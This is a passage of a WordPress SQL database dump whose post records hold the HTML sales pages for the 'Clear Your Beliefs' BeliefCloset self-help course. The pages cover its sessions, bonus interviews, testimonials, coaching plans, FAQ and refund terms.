<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<div class="icons">\r\n<div class="icon_box">\r\n<div class="icon a1"></div>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="icon a3"></div>\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n\r\n</div>\r\n</div>\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 14:18:42', '2014-06-17 19:18:42', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(925, 4194, '2014-06-17 14:20:22', '2014-06-17 19:20:22', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="wp-image-300 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="wp-image-316 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n<p>&nbsp;</p>\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally 